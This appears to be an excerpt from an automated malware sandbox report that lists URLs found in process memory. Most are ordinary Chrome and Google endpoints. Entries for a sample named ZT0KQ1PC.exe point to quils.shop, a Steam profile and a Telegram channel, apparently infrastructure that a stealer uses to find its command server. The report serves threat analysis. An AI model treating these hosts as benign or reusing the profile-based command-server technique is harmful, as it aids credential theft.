Source: chrome.exe, 00000006.00000003.1827318065.00004C1C05E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937766271.00004C1C05218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937372727.00004C1C05184000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796882619.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000006.00000002.2935971441.00004C1C04EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937251939.00004C1C05150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000006.00000003.1827318065.00004C1C05E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933031959.00004C1C046D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796882619.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000006.00000002.2933031959.00004C1C046D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937251939.00004C1C05150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000006.00000003.1827318065.00004C1C05E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937251939.00004C1C05150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796882619.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000006.00000002.2940049112.00004C1C05C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941229424.00004C1C05FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941311391.00004C1C05FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941229424.00004C1C05FDA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938093396.00004C1C05288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730127919&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000006.00000002.2940049112.00004C1C05C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2707037862.00004C1C057E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933031959.00004C1C046D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937766271.00004C1C05218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941311391.00004C1C05FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938022722.00004C1C05264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933180215.00004C1C04714000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730127962&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000006.00000002.2939649525.00004C1C05A20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941229424.00004C1C05FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2932293933.00004C1C0450C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2938183571.00004C1C0529C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941311391.00004C1C05FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2941229424.00004C1C05FDA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1730214257&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937372727.00004C1C05184000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796882619.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000006.00000003.1827318065.00004C1C05E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936880973.00004C1C050B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937372727.00004C1C05184000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937251939.00004C1C05150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1796882619.00004C1C04B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000006.00000002.2936662178.00004C1C05030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000006.00000002.2935490550.00004C1C04DA3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000006.00000003.1801440864.00004C1C05554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801206345.00004C1C047AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801355903.00004C1C054E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000006.00000002.2938695223.00004C1C05448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936309783.00004C1C04F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2939589331.00004C1C05940000.00000004.00000800.00020000.00000000.sdmp, chromecache_66.8.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000006.00000002.2938695223.00004C1C05448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936309783.00004C1C04F60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=trueL
Source: chrome.exe, 00000006.00000002.2935490550.00004C1C04DA3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shop
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quils.shop/
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quils.shop/5
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quils.shop/?
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quils.shop/X
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.00000000005EF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shop4175dd025e2d1xe
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000520000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shopA1DB1NY
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000520000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shopY.exe
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.00000000005EF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shopata
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.00000000004BF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shoposh;
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.00000000005EF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://quils.shopss.exe
Source: chrome.exe, 00000006.00000002.2932222029.00004C1C044E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000006.00000002.2932739792.00004C1C0460C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934807402.00004C1C04BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934775621.00004C1C04BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934807402.00004C1C04BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934775621.00004C1C04BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000006.00000002.2933438632.00004C1C0481C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813147809.00004C1C05778000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818510116.00004C1C056E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813309990.00004C1C05780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818478911.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813075023.00004C1C05770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: ZT0KQ1PC.exe, ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199811540174
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199811540174hu76faMozilla/5.0
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: ZT0KQ1PC.exe, ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, ZT0KQ1PC.exe, 00000002.00000002.1831552138.0000000001088000.00000004.00000020.00020000.00000000.sdmp, ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/w211et
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/w211ethu76faMozilla/5.0
Source: chrome.exe, 00000006.00000002.2935740515.00004C1C04E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000006.00000002.2932680702.00004C1C045E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000006.00000002.2939741757.00004C1C05AF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://update.googleapis.com/service/update2/json
Source: chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2932030280.00004C1C044AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://update.googleapis.com/service/update2/json?cup2key=13:3YiZRfUAzc349ZTC5L53qvb-nxxBWJcV-7-vAK
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: chrome.exe, 00000006.00000002.2936466990.00004C1C04FA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000006.00000002.2936466990.00004C1C04FA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000006.00000002.2936466990.00004C1C04FA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000006.00000002.2936466990.00004C1C04FA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000006.00000003.1800795809.00004C1C05064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934107230.00004C1C04A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000006.00000002.2935936274.00004C1C04E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934891255.00004C1C04C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000006.00000002.2936626910.00004C1C0500C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000006.00000002.2937930226.00004C1C05248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000006.00000002.2937546552.00004C1C051D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934839061.00004C1C04BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2932680702.00004C1C045E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000006.00000002.2937546552.00004C1C051D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934839061.00004C1C04BF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2932680702.00004C1C045E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
Source: chrome.exe, 00000006.00000002.2939831539.00004C1C05B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3
Source: chrome.exe, 00000006.00000002.2939831539.00004C1C05B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3L
Source: chrome.exe, 00000006.00000002.2934291583.00004C1C04A94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmpp
Source: chrome.exe, 00000006.00000002.2934708891.00004C1C04B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ad5s34ywdsfcds6w2agkuf5izs4a_20241223.706874907.
Source: chrome.exe, 00000006.00000002.2932392658.00004C1C04554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ad5twkjlqvwikbzelyrya7eemgzq_9456/hfnkpimlhhgiea
Source: chrome.exe, 00000006.00000002.2932323520.00004C1C0451C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemd
Source: chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/ee
Source: chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocnca
Source: chrome.exe, 00000006.00000002.2932392658.00004C1C04554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/eoxvpqsyhqbmcsgpe27edattly_3057/jflookgnkcckhoba
Source: chrome.exe, 00000006.00000002.2937510305.00004C1C051B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/gxfxw5tpagw5sjcjp5n3fng72a_2024.12.19.1218/ggkke
Source: chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
Source: chrome.exe, 00000006.00000002.2935644252.00004C1C04DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkh
Source: chrome.exe, 00000006.00000003.2151765904.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1797131438.00004C1C04FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934708891.00004C1C04B78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1801124830.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1826379356.00004C1C04FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936533102.00004C1C04FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1795809133.00004C1C04FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1863135499.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1967306323.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933700656.00004C1C048F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819870551.00004C1C04FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2933958275.00004C1C049C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000006.00000002.2933438632.00004C1C0481C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813147809.00004C1C05778000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818510116.00004C1C056E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813309990.00004C1C05780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818478911.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813075023.00004C1C05770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000006.00000003.1813075023.00004C1C05770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818154218.00004C1C05734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2939212221.00004C1C0570D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000006.00000003.1801355903.00004C1C054E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000006.00000002.2935864843.00004C1C04E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000006.00000002.2931820488.00004C1C0441C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000006.00000003.1824029174.00004C1C05AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824186579.00004C1C05AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1823953096.00004C1C05AA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824153095.00004C1C05AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1823915442.00004C1C05AA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824311447.00004C1C05AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824339327.00004C1C05AD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1823875773.00004C1C05AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824064472.00004C1C05AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824282061.00004C1C05ACC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1824218374.00004C1C05AC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000006.00000003.1820045518.00004C1C0580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000006.00000002.2932739792.00004C1C0460C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000006.00000002.2932739792.00004C1C0460C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000006.00000002.2932739792.00004C1C0460C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000006.00000002.2932739792.00004C1C0460C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000006.00000002.2933607469.00004C1C048BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2936309783.00004C1C04F60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
